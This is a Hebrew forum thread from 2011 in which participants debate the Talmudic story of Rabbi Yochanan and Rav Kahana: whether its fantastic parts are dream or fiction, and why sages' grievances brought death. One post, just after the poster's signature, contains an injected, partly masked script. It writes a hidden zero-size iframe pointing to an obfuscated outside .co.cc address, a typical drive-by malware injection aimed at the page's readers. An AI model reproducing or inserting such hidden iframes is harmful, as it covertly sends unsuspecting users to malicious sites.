|
|
| נשלח ב-22/5/2011 01:32 |
|
| |
יונתן
דומה שיש תשובה פשוטה למדי לשאלותיך.
א. ההקפדה של ר' יוחנן היא סיבה מספקת למותו של המצער. כך נראה ממעשה ר"א ור"ג שהבאתי לעיל.
זה מעורר קושי תיאולוגי. אכן.
ב. לגבי הליכתו של ר' יוחנן, וההמשך, ברור לדעתי שכל זה היה בחלומו של ר' יוחנן. דוק ותמצא קל.
|
|
|
| נשלח ב-22/5/2011 01:33 |
|
| |
| מיימוני כתב: |  | | יש מפרשים ש"כשגגה היוצאת מלפני השליט" דהיינו סוג של קללה בטעות, כעין מה שאמרו שקללת חכם אפילו על תנאי היא באה. וכעין אמירת יעקב על רחל. |
|
ומה נפלאים דבריו הקולעים של ר' אברהם:
עם אשר תמצא את אלהיך לא יחיה - רק אהרגנו. ויש אומרים שהיה דרך תפילה על כן מתה רחל בדרך. אם כן יודיענו מי התפלל על אשת פנחס: (אבן עזרא)
|
|
|
|
| נשלח ב-22/5/2011 01:35 |
|
| |
אז האם ר' כהנא מת במציאות או לא? אני חושב שהתייחסותו השלילית של ר' יוחנן לתלמוד הבבלי גרמה לבבלי להוסיף אלמנטי פנטזיה לסיפור כדי להעלות את קרנו.
|
|
|
|
| נשלח ב-22/5/2011 02:13 |
|
| |
יונתן
אני מבין שכוונתך לרבי אברהם בן עזרא. שמחתי לגלות שהוא סבור כמוני.
לא הבנתי את התייחסותו לאשת פנחס. מה קרה לה? לפי איזה מקור?
לגבי רב כהנא, סבורני שהחלק שבו מת אכן קרה. וזה עולה בקנה אחד עם עוד דוגמאות שבהן מתו תלמידי חכמים וקישרו זאת לכך שצערו תלמידי חכמים אחרים, אולי גדולים מהם.
מה שקרה אחר כך, כלומר הבירור של ר' יוחנן שטעה ברב כהנא, גרמה לו רגשות אשמה, ואת מצוקתו פתר על ידי החלום של ביקור במערת הקבורה שלו, הצורך שלו להציג עצמו כתלמיד אצל הרב (אפשר וסביר בעיני שר' יוחנן, עם כל הטעות שטעה, עדיין היה תלמיד חכם גדול מרב כהנא, אם אפשר לדרג ועל איזה בסיס), וכמובן החלום כאילו החיה אותו. כיון שהיה עליו להתעורר ולהווכח שרב כהנא מת, המציא לעצמו תירוץ: רב כהנא מסרב לחזור לחיים אם לא יובטח לו שלא יסבול שוב צער מיתה. וכמובן זה מעורר את הקושי שהלא ר' יוחנן כבר התפלל עליו שיחיה. ואם נאמר שדיבר איתו בעולם הבא, אזי למה התפלל עליו קודם שיחיה?
סוף דבר: ייראה לי כפי שכתבתי, שהכל דמיונו או חלומו של ר' יוחנן.
(אלא שהייתי מוסיף מדברי מרת ראולינג זכורה לטוב, על ידי דמבלדור (הארי פוטר, כרך ז, הפרק על תחנת הרכבת בסופו: ואם זה קורה בדמיון שלך, האם זה פחות מציאותי?)
*** לא הבנתי את מה שכתבת על ההתייחסות השלילית של ר' יוחנן לבבלי. אולי כונתך להתייחסות שלילית של ר' יוחנן לבבליים? האם יש לזה מקור? ואם זה נכון היסטורית, מדוע שידונו אותו, את ר' יוחנן, ברותחים, יותר משאר אמוראים? הלא נשכחה שנאתם (אם היתה) וגם עברה?
|
|
|
|
| נשלח ב-22/5/2011 02:31 |
|
| |
אשת פנחס כלת עלי הכהן, מתה בעת לידתה כמו רחל אמנו: 18 ויהי כהזכירו את-ארון האלהים ויפל מעל-הכסא אחרנית בעד יד השער ותשבר מפרקתו וימת כי-זקן האיש וכבד והוא שפט את-ישראל ארבעים שנה. 19 וכלתו אשת-פינחס הרה ללת ותשמע את-השמעה אל-הלקח ארון האלהים ומת חמיה ואישה ותכרע ותלד כי-נהפכו עליה צריה. 20 וכעת מותה ותדברנה הנצבות עליה אל-תיראי כי בן ילדת ולא ענתה ולא-שתה לבה. 21 ותקרא לנער אי-כבוד לאמר גלה כבוד מישראל אל-הלקח ארון האלהים ואל-חמיה ואישה. 22 ותאמר גלה כבוד מישראל כי נלקח ארון האלהים.
התיאוריה שלך בעייתית כי א"א לדעת מתי נגמר החלק האמיתי ומתי הדמיוני. אולי גם מותו של רב כהנא הוא דמיוני.. (כמו המעשה הידוע של רבא ור' זירא בפורים) התייחסותו של ר' יוחנן לבבלי: בראשית רבה פרשת נח פרשה לחעל כן קרא שמה בבל, חד תלמיד מן דרבי יוחנן הוה יתיב קדמוהי, והוה מסבר ליה ולא סבר, א"ל מ"ט לית את סבר, א"ל דאנא גלי מן ארעאי, א"ל מהיכן ארעא דידך, א"ל מן בורסיף, א"ל לא תימר לי כן אלא מן בולסיף, כי שם בלל ה' שפת כל הארץ.
תלמוד בבלי מסכת סנהדרין דף כד עמוד אמאי בבל? אמר רבי יוחנן: בלולה במקרא, בלולה במשנה, בלולה בתלמוד. במחשכים הושיבני כמתי עולם אמר רבי ירמיה: זה תלמודה של בבל.
ועוד:
http://upload.kipa.co.il/media-upload/ramban/ramban10190-7292010.DOCהם לא בדיוק דנו אותו ברותחים, מוסר ההשכל בסיפור הוא השורה האחרונה: אוקמיה שייליה כל ספיקא דהוה ליה ופשטינהו ניהליה היינו דאמר ר' יוחנן דילכון אמרי דילהון היא
העירו, העמידו, שאלו [ר' יוחנן את רב כהנא] כל הספיקות שהיו לו ופתר אותם לו.
זהו שאמר ר' יוחנן [בכמה מקומות] - מה שאני אומר שלכם, שלהם [של בני בבל] היא, [שהם הדברים שלמד מרב כהנא באותו זמן].
 |
|
|
|
|
|
| נשלח ב-22/5/2011 08:52 |
|
| |
יונתן
לא בפעם הראשונה אני נתקל בביקורת כזו, לגבי ההבדלה בין מה שאמור להיות פשט לדרש או לדמיון.
הבעיה נוצרת כיון שלא תמיד מתריעים בפנינו מספרי הסיפור שיש מעבר כזה.
והתשובה היא שאנו אמורים להבין בעצמנו, כי לא כל דבר נאמר.
זכר לדבר: מעשה באותו חסיד שהלך לישון בבית הקברות, ויש מהמפרשים שכותבים בסגנון נועז (נדמה לי המהרשא) שהכל היה חלומו. ונדמה לי טעמו הלכתי, שאסור לישון שם.
בדורות האחרונים כבר אי אפשר להביא טעם מכוח המציאות, שהדברים לא יכלו לקרות, או שהם מכילים סתירה פנימית (איקון עצוב). וראוי להפנות לדברי הרשב"א (לא הרמב"ם ולא ריה"ל, הרשב"א) שדבר תורה שסותר את הידע המדעי יש לפרשו מחדש.
*** לא הבנתי תחילה שכוונתך לפנחס הזה. חשבתי שהכוונה לפנחס מן המקרא.
והשאלה יפה, שהרי שתיהן הקשו ללדת ומתו.
וצדק האבן עזרא, שהרי גם בגמרא אמרו שלידה היא זמן בדיקה לאשה. כלומר שהיא בסכנה.
*** לגבי התשובות שענה רב כהנא לר' יוחנן בחלומו, אפשר שאתה צודק מבחינה מסויימת. כלומר, ר' יוחנן עבר שינוי עקב הזעזוע שגרם למותו של רב כהנא, ולמד להסתכל מחדש על הבבליים. מדוע התנגד להם מעיקרא איני יודע. אולי הנסיון שלו איתם לא היה טוב. אמנם תמוה שגדול בתורה יקפוץ למסקנות גורפות לגבי מוצא. ושמא היה מן הצדק בדברים. בבל היתה ירודה בתורה כפי שמובא שרב מצא שהם אינם מבדילים בין בשר לחלב.
|
|
|
|
| נשלח ב-22/5/2011 08:53 |
|
| |
תוספת (שהייתי צריך לזכור קודם): עליית התורה בבבל היתה בחלקה פרי הגיעו של רב לשם. ור' יוחנן ביטל עצמו לפני רב אך ראה בשמואל בן דרגתו כמובא בסיפור זה ואחר.
|
|
|
| נשלח ב-22/5/2011 10:31 |
|
| |
זהו, שמה שאני חושב זה שלר' יוחנן היתה דיעה מאוד שלילית על חכמי בבל וכשרב כהנא הגיע לישראל והראה לר' יוחנן את חכמתם של חכמי בבל חזר בו ר' יוחנן מהתיאוריה שלו, אבל הבבלי מספר את זה בתוספת אלמנטים פנטסטיים (כמו בעוד הרבה מעשיות). הבבלי הרבה פעמים מוסיף נופך פנטסטי למעשיות שלו (האמת שלבבליים היו הרבה מאוד אמונות תפלות והאמינו בדברים שמחוץ לגדר הטבע. אני די בטוח שיש מעשיות שבירולמי מסופרות באופן קצר ואילו בבבלי נוספים להם כל מיני "הוקוס-פוקוס". דוגמא קטנה היא מספר הכהנים בבית שני שהירושלמי כותב שהם היו שמונים ומשהו והבבבלי אומר יותר משלוש מאות והרשעים לא הוציאו שנתם) גם המעשה של רבי ואנטונינוס והמערה בינהם ושאנטונינוס היה הורג כל פעם 2 עבדים ותלמידו של רבי החייה אחד מהם הוא מעשה שהבבלי משתמש בו להאדרת שמם של תלמידי בבל. (ובבקשה בלי עוד תירוצים של "זה בחלום" :-) )
|
|
|
|
| נשלח ב-22/5/2011 11:03 |
|
| |
ימימוני כתב - ההקפדה של ר' יוחנן היא סיבה מספקת למותו של המצער. כך נראה ממעשה ר"א ור"ג שהבאתי לעיל ותמהני על שריו"נ הקפיד על כך. איני רואה בדמיוני את רבי ישראל סלנטר ועוד רבים וטובים מקפידים על כך
|
|
|
|
| נשלח ב-22/5/2011 11:51 |
|
| |
| תלמידטועה כתב: |  | |
ימימוני כתב - ההקפדה של ר' יוחנן היא סיבה מספקת למותו של המצער. כך נראה ממעשה ר"א ור"ג שהבאתי לעיל ותמהני על שריו"נ הקפיד על כך. איני רואה בדמיוני את רבי ישראל סלנטר ועוד רבים וטובים מקפידים על כך |
|
ההבדל נעוץ בתקופה.
הרי ר' יוחנן חי בתקופה שבה היה נחוץ ביסוס למעמדם של חכמים ולכן התלמוד מלא במעשיות על מה שקורה לאלה שפוגעים או מצערים תלמידי חכמים.
בתקופתו של ר' ישראל סלנטר מעמדם של חז"ל היה מובטח (מכח אותם סיפורים...)וכבר לא מדובר יותר בתקופה של מעשיות ולכן אין מקום יותר מבחינה מוסרית להקפדות וקפידות.
תוקן על ידי צענערענע ב- 22/05/2011 11:52:20
|
|
|
|
| נשלח ב-22/5/2011 12:20 |
|
| |
עד כדי כך שרשב"י (כן, זה שחגגו לו הילולה אתמול) ראה את ר' יהודה בן גרים שגרם (בשוגג כנראה) לצערו והמעשייה מסתיימת בצורה לא פחות דרמטית מאקס-מן או הארי פוטר: "נתן בו עיניו ועשהו גל של עצמות"...
(האם חכמי הגמ' ניסו להפחיד את המון העם מפגיעה בתלמידי חכמים ע"י הוספת מעשים כאלה לתלמוד?)
תוקן על ידי יIנתן ב- 22/05/2011 12:21:47
|
|
|
|
| נשלח ב-22/5/2011 13:19 |
|
| |
יונתן, צענע, תלמיד טועה (טוב לראותך ולקרוא ממחשבותיך, כשאתה סוף סוף בא) וכולם
יש כאן כמה נקודות ואני זקוק להבדיל ביניהן, כרגיל בסעיפים.
1. האם הסיפורים המסופרים בבבלי הם עובדות או פנטסיות?
אם נניח שהן דמיון, הכיצד הרשו לעצמם העורכים והמספרים להמציאם?
אם לא, מה עם החלקים הבלתי אפשריים?
לסיפור על רבי ואנטונינוס, שהיה הורג שני עבדים, ופעם היה אצל רבי אחד התנאים שהתפלל על המת וקם וחי, לזה אין לי שום הסבר. איני מאמין שזה יתכן. אני מאמין ואף יודע שה' יכול לעשות הכל, אבל לא ייראה לי שה' עושה כאלו ניסים. (אפשר לדחוק שרק התעלף וה' עזר לו לשרוד, כגון מה שמפרשים בדיון הידוע בין המפרשים על בן השונמית, אבל כולי האי למה לי=למה להידחק כל כך).
נוח יותר להניח שיש כאן סיפור דמיוני, ואז חוזרת השאלה: למה סיפרו אותו.
ההשערה היחידה שאני יכול להעלות היא שזה סיפור שנועד להעביר מסר בדרך משלים. יש שפירשו באופן כזה. בדרך כלל איני מחבב פרשנויות כאלו, אבל אין לי טובה מזו.
אפשר גם לומר שהמספרים רצו להאדיר את הניסים שעושה ה' לרבי ולחכמים, אבל זה נראה לי עדיין מרחיק לכת.
2. יש אגדות חז"ל שבאות לספר דברים פנטסטיים, אבל אז הן מנוסחות באופן שדי ברור שאין הן אמורות להיות עובדה היסטורית. הסיפור על רב כהנא מסופר כעובדה, וחלקו האחרון ניתן להתפרש כחלום, ואז הכל עולה יפה. כך זה בעיני. וזה עדיף.
3. יש טוענים שהבבלי מרבה להמציא סיפורים, וכורתים בחרב חדה אפילו מעשים כמו זה על הלל שעלה לראש הגג וקפא כדי להקשיב לשיעור. זו לדעתי שאלה מתודולוגית. נניח שהסיפור מופיע בבבלי ולא בירושלמי. האם זה פוסל אותו? אם יש טעמים נוספים, כמו שהוא בלתי אפשרי, אצטרף לשוללים. עד אז, אני מורגל לתת אמון בסיפורי התלמוד כפועל יוצא מאמוני בחכמים.
*** תלמיד טועה
אתה מעלה נקודות שרציתי להעלות בעצמי וקדמתני.
יש כאן שתי נקודות קשות אם נקבל את ההשערה, שלכאורה עולה בקנה אחד עם המקורות, שה' מעניש את המצערים את החכמים.
1. מדוע ה' מחמיר כל כך.
2. מדוע חכמים הרשו לעצמם להקפיד ולהזיק?
איני יודע מדוע בחרת להזכיר דווקא את ר' ישראל מסלנט. אני משער שאולי התכוונת למעשה שמוכר לי בגרסה זו: פעם סיפרו לו על אדמור שכל מי שגורם לו צער, כיון שהצטער האדמור, ההוא לוקה או מת.
המספרים התכוונו להאדיר את עוצמתו של האדמור. ר' ישראל הגיב: אם כן, שומה עליו להיזהר מאד שלא יקפיד כדי לא להזיק!
לגבי השאלה השניה, תשובה אפשרית ואף מקובלת היא שר' יוחנן לא רצה שרב כהנא ימות, אלא שברגע שנגרם לו צער, מייד נידון המצער בשמים.
לפי זה, כאשר ר"ע אמר ליב"נ שהוא עלול למות, לא היתה זו קללה אלא אזהרה מפני העתיד להתרחש.
הסבר כזה פותר את הקושי המוסרי, אבל הוא אינו הולם את כל הסיפורים מסוג זה.
לגבי השאלה מדוע ה' מקפיד כל כך דווקא בנושא זה, לשם כך אני סבור שראוי להיכנס לשאלה של ענישה בכלל, שעליה רמזתי בסוף דברי בפתיחת האשכול.
***** תוקנה טעות הקלדה ***_________________
שומר פיו ולשונו - שומר מצרות נפשו
******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");>
תוקן על ידי מיימוני ב- 22/05/2011 13:20:28
 |
|
|
|
|
| נשלח ב-22/5/2011 13:28 |
|
| |
האם לא מוצגת כאן תפיסת לימוד היררכית, בניגוד למה שחינכו בישיבות הליטאיות בדורות האחרונים?
|
|
|
|
| נשלח ב-22/5/2011 18:10 |
|
| |
[בע"ב,
אתה מוכן להסביר את שאלתך? איני בטוחה שהבנתי למה כוונתך.]
|
|
|
|
| נשלח ב-22/5/2011 18:18 |
|
| |
אמשלום מסופר על הרב שך, שהשיעור שלו דמה לשדה קרב, והאו היה שמח מאוד אם תלמיד הצליח לפרוך את שיעוריו. לעומת זה, הספור כאן מראה על יחס ברור בין רב לתלמיד,
|
|
|
|
|